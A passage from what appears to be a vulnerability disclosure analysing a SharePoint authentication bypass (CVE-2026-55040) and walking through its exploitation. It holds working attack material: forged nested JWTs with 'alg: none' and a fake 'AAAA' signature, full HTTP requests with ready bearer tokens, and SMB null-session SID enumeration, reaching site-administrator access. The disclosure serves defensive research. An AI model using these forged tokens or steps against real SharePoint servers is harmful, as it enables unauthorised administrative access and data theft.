}</pre><p></p><p><span style='font-size: undefined;'>For the outer token with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>alg: none</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RawSignature</span></span><span style='font-size: undefined;'> is empty (the JWT format is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>header.payload</span></span><span style='color:rgb(24, 128, 56);font-size: undefined;'>.</span><span style='font-size: undefined;'> with nothing after the final dot). At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[1]</span></span><span style='font-size: undefined;'>, extracting after the last dot yields an empty string. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[2]</span></span><span style='font-size: undefined;'>, the method recurses into the actor token. The actor token's signature is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>AAAA</span></span><span style='font-size: undefined;'>, a non-empty string, so at </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[3]</span></span><span style='font-size: undefined;'> it returns </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>"AAAA"</span></span><span style='font-size: undefined;'> without any cryptographic verification that this value is a valid RSA signature.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Summary</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The four weaknesses combine as follows:</span></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker sends a JWT with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>alg: none</span></span><span style='font-size: undefined;'> in the outer header, so no signature is required in the outer token.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The actor token's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> header contains SharePoint's own STS certificate thumbprint, allowing us to resolve a signing key with no verification.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The resolved certificate is not in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TrustedSecurityTokenServices</span></span><span style='font-size: undefined;'>, allowing the issuer to be accepted.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>The actor token's signature is a non-empty value, e.g. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>AAAA</span></span><span style='font-size: undefined;'>, which is never verified.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>After validation, the outer token's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>nameid</span></span><span style='font-size: undefined;'> claim, containing either an attacker controlled Windows Security Identifier (SID) or an attacker controlled User Principal Name (UPN), is resolved to a user identity via </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPIncomingServerToServerProtocolIdentityHandlerV2.ValidateAndEnsureIdentity()</span></span><span style='font-size: undefined;'>. Alternatively a name id of </span><span style='font-size: undefined;'><span data-type='inlineCode'>0#.w|nt authority\local service</span></span><span style='font-size: undefined;'> can be used to identify as a known local service, through an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>AccessToken</span></span><span style='font-size: undefined;'> identifier. Our testing showed identifying as a local service exposed less authenticated attack service than identifying via either a SID or UPN. </span></p><p><span style='font-size: undefined;'>Our PoC</span><a href="https://github.com/sfewer-r7/CVE-2026-55040" target="_blank"><span style='font-size: undefined;'> script</span></a><span style='font-size: undefined;'> shows examples of all three mechanisms working.</span></p><h2 style="direction: ltr;">Walkthrough</h2><p style="direction: ltr;"><span style='font-size: undefined;'>We can see a concrete example of the bypass in action by inspecting the HTTP requests required to achieve the authentication bypass.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In order to know the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> value to use in the inner </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>actortoken</span></span><span style='font-size: undefined;'> token, we must first retrieve the x509 certificate of the STS signing certificate from the target SharePoint site. We can do this via an unauthenticated request to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/_layouts/15/metadata/json/1</span></span><span style='font-size: undefined;'> URI. For example:</span></p><p></p><pre language="html">GET /_layouts/15/metadata/json/1 HTTP/1.1
Host: 192.168.86.11
User-Agent: curl/7.81.0
Accept: */*
</pre><p></p><p><span style='font-size: undefined;'>Which returns the STS signing certificate as part of the response:</span></p><p></p><pre language="html">HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-SharePointHealthScore: 0
X-AspNet-Version: 4.0.30319
SPRequestGuid: e01a0ca2-7b83-e0bd-6d28-7d5115ac774c
request-id: e01a0ca2-7b83-e0bd-6d28-7d5115ac774c
X-FRAME-OPTIONS: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com;
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 16.0.0.19725
X-Content-Type-Options: nosniff
X-MS-InvokeApp: 1; RequireReadOnly
Date: Tue, 21 Apr 2026 10:06:12 GMT

{"issuer":"00000003-0000-0ff1-ce00-000000000000@af90cc03-4a26-45e9-906a-609cebcebbde","keys":[{"keyValue":{"type":"x509certificate","value":"MIIEhzCCAm+gAwIBAgIQbgEQC4zI97pMh7WkdsMmtTANBgkqhkiG9w0BAQsFADBaMQswCQYDVQQGEwJVUzESMBAGA1UEChMJTWljcm9zb2Z0MRMwEQYDVQQLEwpTaGFyZVBvaW50MSIwIAYDVQQDExlTaGFyZVBvaW50IFJvb3QgQXV0aG9yaXR5MCAXDTI2MDMxMTIwMjY1M1oYDzk5OTkwMTAxMDAwMDAwWjBiMQswCQYDVQQGEwJVUzESMBAGA1UEChMJTWljcm9zb2Z0MRMwEQYDVQQLEwpTaGFyZVBvaW50MSowKAYDVQQDEyFTaGFyZVBvaW50IFNlY3VyaXR5IFRva2VuIFNlcnZpY2UwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDY8RNv0VUdgmBubMAHYBI8nu1pWUwUDJywDIwKxgoLuu26Wd6tTMnk5Fb7kYVT+gw+wdW80DeOU\/9lAySKat+FESEuwoUKbJP1Kk6vbuvWyYofz91i9oCXXzqAR1AwNsMGr1nAszVRbPaTrcidomvT2DzQ4YBW2IGtDJEpXIcSrN4T5B4bNH+2rXk11vZHG7c31Y\/VuAwybLGndwSYoiT8aTOgnHsEB9jqZjipkinwnowhk1d6LsPawm6X+y8z7SqkVgMdqKVB5gAMECUedv0qGd2+AW\/2j8Dbk3NNW3XddCBye2wQP0GeioQjcveDK4U0n+3qJjOwG0Y4\/7Jex\/IVAgMBAAGjPzA9MA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEAPXw7TdU6U9ij28uirUm4oQk6Qtdx42G8JNkz44oF4s1ifaODLKqgXCViHRo0bJj3KAz1aSWUdld\/wrOw99tbxPme9sd8ilHN61fKjUPzl7NMyA85895FnA5J62sKcPjmusDHD1WjSYA+y47L\/I3qlUCL9nOPhqjHN4bEQYJV7c9X+9lmnK1QBmqtjQ+Dy8tie6B9XKvSZgb8clVc7pXeG3k4eqNqi8AtgLoW6UmT\/7tXzqotC9oyBmeA3Ucaj99HJ\/4zBN7cOjIL78xNYds8DIVEqGqZFL30uOvJnEecAmtHbMg5yX2oO0p11PSM+JVIiC7gWClfaZ0Ta0tLG5VdmX0wfzmxS+jBEFqvFUA3BFuClQeamKdvIBE7cFXG\/MujpCboiLP0qdZUhGUduFiy94vH0oxKQFZVLT62T4cNbMu0WGGOY67N8p9UKzUvLVis0FnR1nQvy4SJSdt4kBzUUA42z70v\/ACpzHLXsETil+MnGbTXMfEGVzl+s2+9Su4OpTtDe8AIMdDPoH8uaHklLF65FUPKa+aHGlTB9VPyYySC++PCIPIra\/uxjb21V+GBPU8YgbFsOiCNF36AcGakskieghg97EBHumzQuoPnnvCkkRr2\/xU59Yxw01eS42pfVNeJlXDGKwEtAiN1Fwkay2Ji7dq\/wXtFy5OsVBlerec="},"usage":"Signing"}],"name":"00000003-0000-0ff1-ce00-000000000000","serviceName":"00000003-0000-0ff1-ce00-000000000000"}</pre><p></p><p><span style='font-size: undefined;'>For completeness, the parsed x509 certificate is shown below.</span></p><p></p><pre language="html">Version:          3 (0x02)
Serial number:    146220597266833583330723281767636346549 (0x6e01100b8cc8f7ba4c87b5a476c326b5)
Algorithm ID:     SHA256withRSA
Validity
  Not Before:     11/03/2026 20:26:53 (dd-mm-yyyy hh:mm:ss) (260311202653Z)
  Not After:      01/01/9999 00:00:00 (dd-mm-yyyy hh:mm:ss) (99990101000000Z)
Issuer
  C  = US
  O  = Microsoft
  OU = SharePoint
  CN = SharePoint Root Authority
Subject
  C  = US
  O  = Microsoft
  OU = SharePoint
  CN = SharePoint Security Token Service
Fingerprints
  MD5:            8c72ddcf6fdf2bdf3cc173bfcff88bf4
  SHA1:           8bf833e6a7d8a7960f5802b5fffd188599e2a4b2
  SHA256:         9d8a6b787ca17ba72b44200d20d689fae33d13fb57fb166563d11e98d247068c
Public Key
  Algorithm:      RSA
  Length:         2048 bits
  Modulus:        d8:f1:13:6f:d1:55:1d:82:60:6e:6c:c0:07:60:12:3c:
                  9e:ed:69:59:4c:14:0c:9c:b0:0c:8c:0a:c6:0a:0b:ba:
                  ed:ba:59:de:ad:4c:c9:e4:e4:56:fb:91:85:53:fa:0c:
                  3e:c1:d5:bc:d0:37:8e:53:ff:65:03:24:8a:6a:df:85:
                  11:21:2e:c2:85:0a:6c:93:f5:2a:4e:af:6e:eb:d6:c9:
                  8a:1f:cf:dd:62:f6:80:97:5f:3a:80:47:50:30:36:c3:
                  06:af:59:c0:b3:35:51:6c:f6:93:ad:c8:9d:a2:6b:d3:
                  d8:3c:d0:e1:80:56:d8:81:ad:0c:91:29:5c:87:12:ac:
                  de:13:e4:1e:1b:34:7f:b6:ad:79:35:d6:f6:47:1b:b7:
                  37:d5:8f:d5:b8:0c:32:6c:b1:a7:77:04:98:a2:24:fc:
                  69:33:a0:9c:7b:04:07:d8:ea:66:38:a9:92:29:f0:9e:
                  8c:21:93:57:7a:2e:c3:da:c2:6e:97:fb:2f:33:ed:2a:
                  a4:56:03:1d:a8:a5:41:e6:00:0c:10:25:1e:76:fd:2a:
                  19:dd:be:01:6f:f6:8f:c0:db:93:73:4d:5b:75:dd:74:
                  20:72:7b:6c:10:3f:41:9e:8a:84:23:72:f7:83:2b:85:
                  34:9f:ed:ea:26:33:b0:1b:46:38:ff:b2:5e:c7:f2:15
  Exponent:       65537 (0x10001)
Certificate Signature
  Algorithm:      SHA256withRSA
  Signature:      3d:7c:3b:4d:d5:3a:53:d8:a3:db:cb:a2:ad:49:b8:a1:
                  09:3a:42:d7:71:e3:61:bc:24:d9:33:e3:8a:05:e2:cd:
                  62:7d:a3:83:2c:aa:a0:5c:25:62:1d:1a:34:6c:98:f7:
                  28:0c:f5:69:25:94:76:57:7f:c2:b3:b0:f7:db:5b:c4:
                  f9:9e:f6:c7:7c:8a:51:cd:eb:57:ca:8d:43:f3:97:b3:
                  4c:c8:0f:39:f3:de:45:9c:0e:49:eb:6b:0a:70:f8:e6:
                  ba:c0:c7:0f:55:a3:49:80:3e:cb:8e:cb:fc:8d:ea:95:
                  40:8b:f6:73:8f:86:a8:c7:37:86:c4:41:82:55:ed:cf:
                  57:fb:d9:66:9c:ad:50:06:6a:ad:8d:0f:83:cb:cb:62:
                  7b:a0:7d:5c:ab:d2:66:06:fc:72:55:5c:ee:95:de:1b:
                  79:38:7a:a3:6a:8b:c0:2d:80:ba:16:e9:49:93:ff:bb:
                  57:ce:aa:2d:0b:da:32:06:67:80:dd:47:1a:8f:df:47:
                  27:fe:33:04:de:dc:3a:32:0b:ef:cc:4d:61:db:3c:0c:
                  85:44:a8:6a:99:14:bd:f4:b8:eb:c9:9c:47:9c:02:6b:
                  47:6c:c8:39:c9:7d:a8:3b:4a:75:d4:f4:8c:f8:95:48:
                  88:2e:e0:58:29:5f:69:9d:13:6b:4b:4b:1b:95:5d:99:
                  7d:30:7f:39:b1:4b:e8:c1:10:5a:af:15:40:37:04:5b:
                  82:95:07:9a:98:a7:6f:20:11:3b:70:55:c6:fc:cb:a3:
                  a4:26:e8:88:b3:f4:a9:d6:54:84:65:1d:b8:58:b2:f7:
                  8b:c7:d2:8c:4a:40:56:55:2d:3e:b6:4f:87:0d:6c:cb:
                  b4:58:61:8e:63:ae:cd:f2:9f:54:2b:35:2f:2d:58:ac:
                  d0:59:d1:d6:74:2f:cb:84:89:49:db:78:90:1c:d4:50:
                  0e:36:cf:bd:2f:fc:00:a9:cc:72:d7:b0:44:e2:97:e3:
                  27:19:b4:d7:31:f1:06:57:39:7e:b3:6f:bd:4a:ee:0e:
                  a5:3b:43:7b:c0:08:31:d0:cf:a0:7f:2e:68:79:25:2c:
                  5e:b9:15:43:ca:6b:e6:87:1a:54:c1:f5:53:f2:63:24:
                  82:fb:e3:c2:20:f2:2b:6b:fb:b1:8d:bd:b5:57:e1:81:
                  3d:4f:18:81:b1:6c:3a:20:8d:17:7e:80:70:66:a4:b2:
                  48:9e:82:18:3d:ec:40:47:ba:6c:d0:ba:83:e7:9e:f0:
                  a4:91:1a:f6:ff:15:39:f5:8c:70:d3:57:92:e3:6a:5f:
                  54:d7:89:95:70:c6:2b:01:2d:02:23:75:17:09:1a:cb:
                  62:62:ed:da:bf:c1:7b:45:cb:93:ac:54:19:5e:ad:e7

Extensions
  keyUsage CRITICAL:
    digitalSignature,keyEncipherment
  extKeyUsage :
    serverAuth, clientAuth
  basicConstraints CRITICAL:
    {}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Using the above x509 certificate, we can compute the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> by base64 decoding the entire x509 certificate, computing the SHA1 digest value, then base64 encoding that raw digest value. In our example we get an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> value of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>i_gz5qfYp5YPWAK1__0YhZnipLI</span></span><span style='font-size: undefined;'>. We can also see we discover the target realm (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>af90cc03-4a26-45e9-906a-609cebcebbde</span></span><span style='font-size: undefined;'>) which we will use later in the forged JWT.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We then begin to construct the malicious JWT. The outer token will have a header of:</span></p><p></p><pre language="json">{"alg": "none", "typ": "JWT"}</pre><p></p><p><span style='font-size: undefined;'>The payload is shown below. The audience (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>aud</span></span><span style='font-size: undefined;'>) claim contains the target systems hostname (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>win-b0i6kv698ls</span></span><span style='font-size: undefined;'>) and realm. The issuer (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>iss</span></span><span style='font-size: undefined;'>) claim is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>00000003-0000-0ff1-ce00-000000000000</span></span><span style='font-size: undefined;'> which is the well known SharePoint principal application ID. The Name ID (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>nameid</span></span><span style='font-size: undefined;'>) represent the SharePoint user we will identify as, in our example we use a SID of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>S-1-5-21-4203888158-2793536450-3921675298-500</span></span><span style='font-size: undefined;'> which represent the domain admin that we want to authenticate as using the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>urn:office:idp:activedirectory</span></span><span style='font-size: undefined;'> identity provider. Finally an inner </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>actortoken</span></span><span style='font-size: undefined;'> token is base64 encoded.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As an aside, we discover the target SID to use by first contacting the target SharePoint servers domain controller over SMB. We can use an SMB NULL session to query the LSARPC named pipe and learn the domain's Domain ID value. Then by appending Relative Identifier (RID) values (e.g. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>500</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1000</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1001</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1002</span></span><span style='font-size: undefined;'>, ...) to the Domain ID, we can construct potential user SIDs to authenticate as. By repeating this process we iterate over all users and discover which ones are valid site user administrators. It is worth pointing out that the forged JWT does not solely require a Windows SID, and we can also identify a user via a User Principal Name (UPN), e.g. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>administrator@domain.local</span></span><span style='font-size: undefined;'> or similar. However, discovering a valid SID is more reliable in an automated scenario (assuming you can access the domain controller) than brute forcing potential UPN's, which is best suited to manual reconnaissance.</span></p><p></p><pre language="json">{
  "aud": "00000003-0000-0ff1-ce00-000000000000/win-b0i6kv698ls@af90cc03-4a26-45e9-906a-609cebcebbde",
  "iss": "00000003-0000-0ff1-ce00-000000000000@af90cc03-4a26-45e9-906a-609cebcebbde",
  "nbf": 1776765672,
  "exp": 1776769572,
  "nameid": "S-1-5-21-4203888158-2793536450-3921675298-500",
  "nii": "urn:office:idp:activedirectory",
  "trustedfordelegation": "true",
  "actortoken": "eyJhbGciOiAiUlMyNTYiLCAidHlwIjogIkpXVCIsICJ4NXQiOiAiaV9nejVxZllwNVlQV0FLMV9fMFloWm5pcExJIn0.eyJpc3MiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQGFmOTBjYzAzLTRhMjYtNDVlOS05MDZhLTYwOWNlYmNlYmJkZSIsICJuYW1laWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQGFmOTBjYzAzLTRhMjYtNDVlOS05MDZhLTYwOWNlYmNlYmJkZSIsICJuYmYiOiAxNzc2NzY1NjcyLCAiZXhwIjogMTc3Njc2OTU3Mn0.AAAA"
}</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Inspecting the inner </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>actortoken</span></span><span style='font-size: undefined;'> token, it will have a header as shown below, which includes the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>x5t</span></span><span style='font-size: undefined;'> value </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>i_gz5qfYp5YPWAK1__0YhZnipLI</span></span><span style='font-size: undefined;'> corresponding to the SharePoint server's STS signing certificate.</span></p><p></p><pre language="json">{"alg": "RS256", "typ": "JWT", "x5t": "i_gz5qfYp5YPWAK1__0YhZnipLI"}</pre><p></p><p><span style='font-size: undefined;'>The inner </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>actortoken</span></span><span style='font-size: undefined;'> token will have a payload as shown below. Note the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>nameid</span></span><span style='font-size: undefined;'> of this token is the same as the issuer of the STS certificate, this allows a call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SPJsonWebSecurityBaseTokenHandlerV2.ValidateActorIsSelfIssuer</span></span><span style='font-size: undefined;'> to succeed.</span></p><p></p><pre language="json">{
  "iss": "00000003-0000-0ff1-ce00-000000000000@af90cc03-4a26-45e9-906a-609cebcebbde",
  "nameid": "00000003-0000-0ff1-ce00-000000000000@af90cc03-4a26-45e9-906a-609cebcebbde",
  "nbf": 1776765672,
  "exp": 1776769572
}</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>And a signature which is an arbitrary non-empty string:</span></p><p></p><pre language="html">AAAA</pre><p></p><p><span style='font-size: undefined;'>Constructing the above JWT, we can base64 encode it as a bearer token and make a request to an authenticated endpoint, such as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/_api/web/currentuser</span></span><span style='font-size: undefined;'> and prove we are authenticating as a SharePoint user.</span></p><p></p><pre language="html">GET /_api/web/currentuser HTTP/1.1
Host: win-b0i6kv698ls
User-Agent: curl/7.81.0
Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL3dpbi1iMGk2a3Y2OThsc0BhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAiaXNzIjogIjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAibmJmIjogMTc3Njc2NTY3MiwgImV4cCI6IDE3NzY3Njk1NzIsICJuYW1laWQiOiAiUy0xLTUtMjEtNDIwMzg4ODE1OC0yNzkzNTM2NDUwLTM5MjE2NzUyOTgtNTAwIiwgIm5paSI6ICJ1cm46b2ZmaWNlOmlkcDphY3RpdmVkaXJlY3RvcnkiLCAidHJ1c3RlZGZvcmRlbGVnYXRpb24iOiAidHJ1ZSIsICJhY3RvcnRva2VuIjogImV5SmhiR2NpT2lBaVVsTXlOVFlpTENBaWRIbHdJam9nSWtwWFZDSXNJQ0o0TlhRaU9pQWlhVjluZWpWeFpsbHdOVmxRVjBGTE1WOWZNRmxvV201cGNFeEpJbjAuZXlKcGMzTWlPaUFpTURBd01EQXdNRE10TURBd01DMHdabVl4TFdObE1EQXRNREF3TURBd01EQXdNREF3UUdGbU9UQmpZekF6TFRSaE1qWXRORFZsT1MwNU1EWmhMVFl3T1dObFltTmxZbUprWlNJc0lDSnVZVzFsYVdRaU9pQWlNREF3TURBd01ETXRNREF3TUMwd1ptWXhMV05sTURBdE1EQXdNREF3TURBd01EQXdRR0ZtT1RCall6QXpMVFJoTWpZdE5EVmxPUzA1TURaaExUWXdPV05sWW1ObFltSmtaU0lzSUNKdVltWWlPaUF4TnpjMk56WTFOamN5TENBaVpYaHdJam9nTVRjM05qYzJPVFUzTW4wLkFBQUEifQ.
Accept: application/json;odata=verbose
</pre><p><br/><span style='font-size: undefined;'>The following response shows this has worked, and the user we identified as is in fact a SharePoint site administrator (The returned </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>IsSiteAdmin</span></span><span style='font-size: undefined;'> value is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>true</span></span><span style='font-size: undefined;'>).</span><br/></p><pre language="html">HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Transfer-Encoding: chunked
Content-Type: application/json;odata=verbose;charset=utf-8
Expires: Mon, 06 Apr 2026 10:06:12 GMT
Last-Modified: Tue, 21 Apr 2026 10:06:12 GMT
Server: Microsoft-IIS/10.0
X-SharePointHealthScore: 0
X-SP-SERVERSTATE: ReadOnly=0
DATASERVICEVERSION: 3.0
SPClientServiceRequestDuration: 12
SPRequestDuration: 83
X-AspNet-Version: 4.0.30319
SPRequestGuid: e01a0ca2-0b92-e0bd-6d28-7b843e6bda5c
request-id: e01a0ca2-0b92-e0bd-6d28-7b843e6bda5c
X-FRAME-OPTIONS: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com;
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 16.0.0.19725
X-Content-Type-Options: nosniff
X-MS-InvokeApp: 1; RequireReadOnly
Date: Tue, 21 Apr 2026 10:06:12 GMT

{"d":{"__metadata":{"id":"https://win-b0i6kv698ls/_api/Web/GetUserById(1073741823)","uri":"https://win-b0i6kv698ls/_api/Web/GetUserById(1073741823)","type":"SP.User"},"Alerts":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetUserById(1073741823)/Alerts"}},"Groups":{"__deferred":{"uri":"https://win-b0i6kv698ls/_api/Web/GetUserById(1073741823)/Groups"}},"Id":1073741823,"IsHiddenInUI":false,"LoginName":"SHAREPOINT\\system","Title":"System Account","PrincipalType":1,"Email":"","IsEmailAuthenticationGuestUser":false,"IsShareByEmailGuestUser":false,"IsSiteAdmin":true,"UserId":{"__metadata":{"type":"SP.UserIdInfo"},"NameId":"S-1-0-0","NameIdIssuer":"urn:office:idp:activedirectory"}}}</pre><p></p><p><span style='font-size: undefined;'>To begin to interact with the target SharePoint site as this user we can acquire a new form digest value via a POST request to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/_api/contextinfo</span></span><span style='font-size: undefined;'> endpoint.</span></p><p></p><pre language="html">POST /_api/contextinfo HTTP/1.1
Host: win-b0i6kv698ls
User-Agent: curl/7.81.0
Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQiOiAiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL3dpbi1iMGk2a3Y2OThsc0BhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAiaXNzIjogIjAwMDAwMDAzLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBhZjkwY2MwMy00YTI2LTQ1ZTktOTA2YS02MDljZWJjZWJiZGUiLCAibmJmIjogMTc3Njc2NTY3MiwgImV4cCI6IDE3NzY3Njk1NzIsICJuYW1laWQiOiAiUy0xLTUtMjEtNDIwMzg4ODE1OC0yNzkzNTM2NDUwLTM5MjE2NzUyOTgtNTAwIiwgIm5paSI6ICJ1cm46b2ZmaWNlOmlkcDphY3RpdmVkaXJlY3RvcnkiLCAidHJ1c3RlZGZvcmRlbGVnYXRpb24iOiAidHJ1ZSIsICJhY3RvcnRva2VuIjogImV5SmhiR2NpT2lBaVVsTXlOVFlpTENBaWRIbHdJam9nSWtwWFZDSXNJQ0o0TlhRaU9pQWlhVjluZWpWeFpsbHdOVmxRVjBGTE1WOWZNRmxvV201cGNFeEpJbjAuZXlKcGMzTWlPaUFpTURBd01EQXdNRE10TURBd01DMHdabVl4TFdObE1EQXRNREF3TURBd01EQXdNREF3UUdGbU9UQmpZekF6TFRSaE1qWXRORFZsT1MwNU1EWmhMVFl3T1dObFltTmxZbUprWlNJc0lDSnVZVzFsYVdRaU9pQWlNREF3TURBd01ETXRNREF3TUMwd1ptWXhMV05sTURBdE1EQXdNREF3TURBd01EQXdRR0ZtT1RCall6QXpMVFJoTWpZdE5EVmxPUzA1TURaaExUWXdPV05sWW1ObFltSmtaU0lzSUNKdVltWWlPaUF4TnpjMk56WTFOamN5TENBaVpYaHdJam9nTVRjM05qYzJPVFUzTW4wLkFBQUEifQ.
Accept: application/json
Content-Length: 0
</pre><p></p><p><span style='font-size: undefined;'>Whose response contains a new </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>FormDigestValue</span></span><span style='font-size: undefined;'> we can begin to use.</span></p><p></p><pre language="html">HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Transfer-Encoding: chunked
Content-Type: application/json;odata=minimalmetadata;streaming=true;charset=utf-8
Expires: Mon, 06 Apr 2026 10:06:12 GMT
Last-Modified: Tue, 21 Apr 2026 10:06:12 GMT
Server: Microsoft-IIS/10.0
X-SharePointHealthScore: 0
X-SP-SERVERSTATE: ReadOnly=0
DATASERVICEVERSION: 3.0
SPClientServiceRequestDuration: 4
SPRequestDuration: 17
X-AspNet-Version: 4.0.30319
SPRequestGuid: e01a0ca2-db97-e0bd-6d28-795e9bdf7bdb
request-id: e01a0ca2-db97-e0bd-6d28-795e9bdf7bdb
X-FRAME-OPTIONS: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com;
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 16.0.0.19725
X-Content-Type-Options: nosniff
X-MS-InvokeApp: 1; RequireReadOnly
Date: Tue, 21 Apr 2026 10:06:12 GMT

